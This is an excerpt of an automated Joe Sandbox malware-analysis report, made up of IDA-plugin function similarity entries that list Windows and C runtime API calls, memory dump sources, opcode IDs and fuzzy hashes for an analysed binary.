                                                                                   • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringWrite
                                                                                  • String ID:
                                                                                  • API String ID: 390214022-0
                                                                                  • Opcode ID: ffa7f9c5bffd323bb1a1d02527120cd226b19091b60ad275cd6b50cf90bea06d
                                                                                  • Instruction ID: 96420380e3573d645a0ac3767eccdea2391d2c65e085b2ba0d13fb23607fa965
                                                                                  • Opcode Fuzzy Hash: ffa7f9c5bffd323bb1a1d02527120cd226b19091b60ad275cd6b50cf90bea06d
                                                                                  • Instruction Fuzzy Hash: 9F110070910B08AFDF11FB69ECA399EBBF8EF65204F5060A1B414E7255DB349E498B20
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0041E164
                                                                                  • DialogBoxIndirectParamA.USER32(?,004A8C88,?,?,0041EA00,?), ref: 0041E1D8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DialogIndirectParam_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3642580103-0
                                                                                  • Opcode ID: 94e404eea6ab7a91b876fa86f80d5c22935f469cb170d8c46225107290bf1702
                                                                                  • Instruction ID: dbeaf7730f8947f4481eb836a2ef357e9a1494175b06a7a2b05cc32a475520fa
                                                                                  • Opcode Fuzzy Hash: 94e404eea6ab7a91b876fa86f80d5c22935f469cb170d8c46225107290bf1702
                                                                                  • Instruction Fuzzy Hash: 9F2127B4A006189FDB14CF54DD91AEAB7B4EF48304F1041DEA849A7351EB70AE84CF95
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00466DF0
                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00466DF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 5a4eeaf07fb52be95e2137fb05e6a2a30ab435a785de69ec8d46153589e1a2b3
                                                                                  • Instruction ID: e032d37f9311a910772b8e37f36217913ac34c7058a93527963cbd76f6b6e92c
                                                                                  • Opcode Fuzzy Hash: 5a4eeaf07fb52be95e2137fb05e6a2a30ab435a785de69ec8d46153589e1a2b3
                                                                                  • Instruction Fuzzy Hash: 5201D8B46003145FC710FFB2D801F5E3A989F90719B01441FB8088B352DA3CC8408B6E
                                                                                  APIs
                                                                                    • Part of subcall function 6A6E2B30: _strrchr.LIBCMT ref: 6A6E2B47
                                                                                    • Part of subcall function 6A6DBF00: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF26
                                                                                    • Part of subcall function 6A6DBF00: GetProcAddress.KERNEL32(00000000), ref: 6A6DBF2D
                                                                                  • DeleteFileA.KERNELBASE(?,?,?,6A6D184E,?), ref: 6A6E1A1F
                                                                                  • GetLastError.KERNEL32(?,?,6A6D184E,?), ref: 6A6E1A25
                                                                                    • Part of subcall function 6A6E10A0: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,6A6E1A0F,?,?,6A6D184E,?), ref: 6A6E10B5
                                                                                    • Part of subcall function 6A6E10A0: GetFileSize.KERNEL32(00000000,?,?,6A6E1A0F,?,?,6A6D184E,?), ref: 6A6E10CB
                                                                                    • Part of subcall function 6A6E10A0: CloseHandle.KERNEL32(00000000,?,6A6E1A0F,?,?,6A6D184E,?), ref: 6A6E10ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Handle$AddressCloseCreateDeleteErrorLastModuleProcSize_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 4044293305-0
                                                                                  • Opcode ID: 92462572b772e1906142f9e06969a1c41cba519b14d2f1d98357f68156f065f8
                                                                                  • Instruction ID: 5706a54251e1eedf83cb5e9941d47486fc54152c8cc8f2108617d904c8275eb6
                                                                                  • Opcode Fuzzy Hash: 92462572b772e1906142f9e06969a1c41cba519b14d2f1d98357f68156f065f8
                                                                                  • Instruction Fuzzy Hash: 09E06532B0E13203DB6223BDE80C36E92A4BF616A4B0B0171F800E7215EFA4CC5366F4
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 9741b04f4f756e8b00bc5e6b619a50bb9340d51e8345a8cb906ca8ace2a9c2be
                                                                                  • Instruction ID: 2061f451f3ddc61c2124fc7919633b662307f070fdd39f10640ae93d25407430
                                                                                  • Opcode Fuzzy Hash: 9741b04f4f756e8b00bc5e6b619a50bb9340d51e8345a8cb906ca8ace2a9c2be
                                                                                  • Instruction Fuzzy Hash: 06F0BB7094030856DB10EB759C4AFD9777C5B04704F40007E9505A72D2DE789998CAD6
                                                                                  APIs
                                                                                  • PeekMessageA.USER32(?,?,00000000,00000000,00000000,00000001), ref: 00407643
                                                                                  • DispatchMessageA.USER32(?,?,?,?,00000000,00000000,00000000,00000001), ref: 00407651
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeek
                                                                                  • String ID:
                                                                                  • API String ID: 1770753511-0
                                                                                  • Opcode ID: d7afd71ecbbf92ebb718570cc8c5b81866b758ac9b037cb983cc461c1654e27a
                                                                                  • Instruction ID: 6d3482b6396e4f8460ffee1d784be06b2f99ea529ceedf00a80f5f615736bc7c
                                                                                  • Opcode Fuzzy Hash: d7afd71ecbbf92ebb718570cc8c5b81866b758ac9b037cb983cc461c1654e27a
                                                                                  • Instruction Fuzzy Hash: 57E0CD71D4430A3AEA10F6B48C87FBF773C9744700F4045157A05651C1FAA9780282B6
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 669ed15c279bad6a4dbe956b154acd07b0bd99c8b55b6b31230c113f204651b9
                                                                                  • Instruction ID: 9be12ea9062a8ea4fa14570185c8da817658d49b918ee431695ef209e5e312a6
                                                                                  • Opcode Fuzzy Hash: 669ed15c279bad6a4dbe956b154acd07b0bd99c8b55b6b31230c113f204651b9
                                                                                  • Instruction Fuzzy Hash: A7E0BF70A00244EBDB149FB5AC49B167A68E705345F04457EA801522A2DE399D50CA5E
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0046E2FE
                                                                                    • Part of subcall function 00472D3D: __amsg_exit.LIBCMT ref: 00472D4D
                                                                                    • Part of subcall function 0046E2A9: __IsNonwritableInCurrentImage.LIBCMT ref: 0046E2B8
                                                                                    • Part of subcall function 0046E2A9: CloseHandle.KERNEL32(?,?,0046E313), ref: 0046E2DC
                                                                                    • Part of subcall function 0046E2A9: __freeptd.LIBCMT ref: 0046E2E3
                                                                                    • Part of subcall function 0046E2A9: RtlExitUserThread.NTDLL(?,00000000,?,0046E313), ref: 0046E2EC
                                                                                    • Part of subcall function 0046E2A9: __XcptFilter.LIBCMT ref: 0046E31F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentExitFilterHandleImageNonwritableThreadUserXcpt__amsg_exit__freeptd__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 285482719-0
                                                                                  • Opcode ID: 4cfde0bc944054a5928bd31fc91d8162ee6307cc806889980e4f87cb81ed7dc8
                                                                                  • Instruction ID: 32ca70eec81774d22c6cc9951cb92662ace5203e54e813bbc637d288f271bbb0
                                                                                  • Opcode Fuzzy Hash: 4cfde0bc944054a5928bd31fc91d8162ee6307cc806889980e4f87cb81ed7dc8
                                                                                  • Instruction Fuzzy Hash: DBE08C74500200EFE718EBA2D80AE6D3761EF44704F20408EF0021B2A2CE7EAD409E19
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 0046FE7D
                                                                                    • Part of subcall function 00472D3D: __amsg_exit.LIBCMT ref: 00472D4D
                                                                                    • Part of subcall function 0046FE34: __IsNonwritableInCurrentImage.LIBCMT ref: 0046FE47
                                                                                    • Part of subcall function 0046FE34: __freeptd.LIBCMT ref: 0046FE61
                                                                                    • Part of subcall function 0046FE34: RtlExitUserThread.NTDLL(?,?,?,0046FE92,00000000), ref: 0046FE6B
                                                                                    • Part of subcall function 0046FE34: __XcptFilter.LIBCMT ref: 0046FE9E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentExitFilterImageNonwritableThreadUserXcpt__amsg_exit__freeptd__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 808183036-0
                                                                                  • Opcode ID: a0f215879faab2a99b49faafd5c05ffb24655868c8072d89eb2c77a74e0c21ed
                                                                                  • Instruction ID: c0d98ab071554176574d50f2759169af7a2f2088870860b569fe1e6fd0226d74
                                                                                  • Opcode Fuzzy Hash: a0f215879faab2a99b49faafd5c05ffb24655868c8072d89eb2c77a74e0c21ed
                                                                                  • Instruction Fuzzy Hash: CDE08671500600DFDB18FBA1C80AE6D3764AF04704F20445EF002572A3CA7D6D40DE15
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 0044C3D9
                                                                                    • Part of subcall function 004428ED: _malloc.LIBCMT ref: 0044290B
                                                                                    • Part of subcall function 0044C2F7: __EH_prolog3.LIBCMT ref: 0044C2FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3$_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1683881009-0
                                                                                  • Opcode ID: d4b3a74f39ae5a5131e3f18b81a23a35ec426fea9819fae1491b4567d260bc75
                                                                                  • Instruction ID: 8bfab0cb2c45efdd4a13562e1dfda205ff69d936a71cec3f065992edea8ace96
                                                                                  • Opcode Fuzzy Hash: d4b3a74f39ae5a5131e3f18b81a23a35ec426fea9819fae1491b4567d260bc75
                                                                                  • Instruction Fuzzy Hash: B0510771900209BBFF51AFB5CD81ABF7BA5EF04304F14442BBD15A6291DB78DA00DBA9
                                                                                  APIs
                                                                                    • Part of subcall function 0044C3D2: __EH_prolog3.LIBCMT ref: 0044C3D9
                                                                                  • _strlen.LIBCMT ref: 00436B22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_strlen
                                                                                  • String ID:
                                                                                  • API String ID: 782648989-0
                                                                                  • Opcode ID: 7ef7f8c98d6133c237d645250cc3a0383d516b0403e2db28396ccee75b90f650
                                                                                  • Instruction ID: 300b3da589383ef56a5b1e059b05774fdd3ab924dc5075ee2610147f0af87bcd
                                                                                  • Opcode Fuzzy Hash: 7ef7f8c98d6133c237d645250cc3a0383d516b0403e2db28396ccee75b90f650
                                                                                  • Instruction Fuzzy Hash: 26516B70A00209EBDB14EF95D891FEEB7B4AF48304F20816AE915A72D1DB786A05CB59
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8b2ea21cefc93775c9f2220716e082ea4c02950f9dea4b70666f30a52793540f
                                                                                  • Instruction ID: a1f159db1ef99974907daa39ddcbff3e3d819e88389a46008eea71cbda193ddd
                                                                                  • Opcode Fuzzy Hash: 8b2ea21cefc93775c9f2220716e082ea4c02950f9dea4b70666f30a52793540f
                                                                                  • Instruction Fuzzy Hash: 49413B71830A44DBCF2CDF24EAA67A2B7A1FB01304F14255EE80667655E736B928CB5C
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1579825452-0
                                                                                  • Opcode ID: 344a82ec800ee1aab126d6eeaae173ab5bdaf4960a409865b081bfba8e8d1763
                                                                                  • Instruction ID: 962407862648008ce1528614915580e2237ddcf5521db0ea1f5143fda63145cf
                                                                                  • Opcode Fuzzy Hash: 344a82ec800ee1aab126d6eeaae173ab5bdaf4960a409865b081bfba8e8d1763
                                                                                  • Instruction Fuzzy Hash: 704116B1E0010ADFDF24CF98C590ABEBBB1AF44304F20856AE61177341C778AA65CF99
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_catch
                                                                                  • String ID:
                                                                                  • API String ID: 3886170330-0
                                                                                  • Opcode ID: f1173f366394ff5f36242959e70fb5a23e6ee143d2890556f3cce2382b519c85
                                                                                  • Instruction ID: c3faa33889a078bb04a157ed4c248709e55e61b394976f3d728e30fd389314ec
                                                                                  • Opcode Fuzzy Hash: f1173f366394ff5f36242959e70fb5a23e6ee143d2890556f3cce2382b519c85
                                                                                  • Instruction Fuzzy Hash: 33416A3120020AEFCF16DFA1C9419AE7BB6FF48306F15416AFC06AA2A2C739CD14DB55
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: InitVariant
• String ID:
• API String ID: 1927566239-0
APIs
• SetFilePointer.KERNEL32(?,?,?), ref: 0BE9BA1E
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: _memcpy_s
• String ID:
• API String ID: 2001391462-0
APIs
• _memset.LIBCMT ref: 0040A902
  • Part of subcall function 0040BB20: GetFileAttributesA.KERNEL32(?,0040A913,0040A913,00000000), ref: 0040BB2B
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: AttributesFile_memset
• String ID:
• API String ID: 231178003-0
APIs
• __EH_prolog3_catch.LIBCMT ref: 004466AC
  • Part of subcall function 00455E53: __EH_prolog3.LIBCMT ref: 00455E5A
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: H_prolog3H_prolog3_catch
• String ID:
• API String ID: 1882928916-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
APIs
• PeekMessageA.USER32(?,?,00000000,00000000,00000000,00000000), ref: 0044A817
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: MessagePeek
• String ID:
• API String ID: 2222842502-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _memcpy_s
• String ID:
• API String ID: 2001391462-0
APIs
• SetFilePointer.KERNEL32(?,?,?), ref: 0BE9BA1E
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
APIs
• CoGetClassObject.COMBASE(?,?,?,00000000,00497360,?,?,?), ref: 0045B08E
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: ClassObject
• String ID:
• API String ID: 1165159591-0
APIs
• SendMessageA.USER32(?,00000030,004A8C94,00000000), ref: 004233BA
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
                                                                                  • Opcode ID: daf338c4b4a4497a60714ef01aad5f5d2596064cf82fc85d19eb41cf9291a5cc
                                                                                  • Instruction ID: 08d322250c66a9d0edee66c7ca26e244cc996df72a8c5dd14d3884821a8114d9
                                                                                  • Opcode Fuzzy Hash: daf338c4b4a4497a60714ef01aad5f5d2596064cf82fc85d19eb41cf9291a5cc
                                                                                  • Instruction Fuzzy Hash: BB01FFB1354108AFE744CF98DC51FAB77B9EB48B00F10865DBA09D7280DA75ED11CBA8
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00000030,004A8C94,00000000), ref: 0042C748
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 1f70388e38c9bf1354dd1d6139266bea6dc46b0ed918489cc2c734be2a4e7cf8
                                                                                  • Instruction ID: 522326500c8cc681e01e86ebf91a011bdb3712949bfc67665f145ea1f6d70092
                                                                                  • Opcode Fuzzy Hash: 1f70388e38c9bf1354dd1d6139266bea6dc46b0ed918489cc2c734be2a4e7cf8
                                                                                  • Instruction Fuzzy Hash: 3B014F71740208BBD744DF98DC91FAF77B9AB48B00F108159BA0597281D674ED51CBA8
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(004864E4,00000030,00000000,00000000,00000000,00000000,?,00445ABF), ref: 0044ABFC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 7a7a763f50ea691d8d289543fb3830c628888a49742701a30bc1712dcc5c6c1d
                                                                                  • Instruction ID: 417e21ca1d3231a1a75b0ce9a3cf002aa552813494142bdc372044adee55af4b
                                                                                  • Opcode Fuzzy Hash: 7a7a763f50ea691d8d289543fb3830c628888a49742701a30bc1712dcc5c6c1d
                                                                                  • Instruction Fuzzy Hash: ABF0BB332842019B776476369A85D7BB2ACEFD232A704141FF441D9551DB2CDC52D62B
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3
                                                                                  • String ID:
                                                                                  • API String ID: 431132790-0
                                                                                  • Opcode ID: 6d4307c3d3216d2c3691441de46f0be4c73c9c212d8863ee4da98eb76adf69f2
                                                                                  • Instruction ID: 0b00ff8cdc6424f98211035f87815ebd26eec8a07ec575e53830226f450dc66c
                                                                                  • Opcode Fuzzy Hash: 6d4307c3d3216d2c3691441de46f0be4c73c9c212d8863ee4da98eb76adf69f2
                                                                                  • Instruction Fuzzy Hash: 1501B1306006068BDF24AF61CA2673B3AA5AB91356F10043FE88187392EF3C8D18C70E
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00000030,004A8C94,00000000), ref: 00424AC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: a5219b4c00c23a135b1ab908ac147dfbe1784543f7d2c725ed9cfad23e24d1a0
                                                                                  • Instruction ID: 60a143e11dfc9fde6bbd76473b7a49a237ae05537c2a94a7d1990def1a51bd1b
                                                                                  • Opcode Fuzzy Hash: a5219b4c00c23a135b1ab908ac147dfbe1784543f7d2c725ed9cfad23e24d1a0
                                                                                  • Instruction Fuzzy Hash: A60100B1A00209ABDB04DF98D851FAFB7B4FF48300F108519F905A7341D675D950CBE4
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 0044B139
                                                                                    • Part of subcall function 004428ED: _malloc.LIBCMT ref: 0044290B
                                                                                    • Part of subcall function 0044AB00: __EH_prolog3.LIBCMT ref: 0044AB07
                                                                                    • Part of subcall function 0044A97C: SetThreadPriority.KERNEL32(00000000,?,00000000,?,0044B190,?,?,?,?,00000004,00409C74,Function_00008B20,00000000,00000000,00000000,00000000), ref: 0044A988
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3$PriorityThread_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 576224324-0
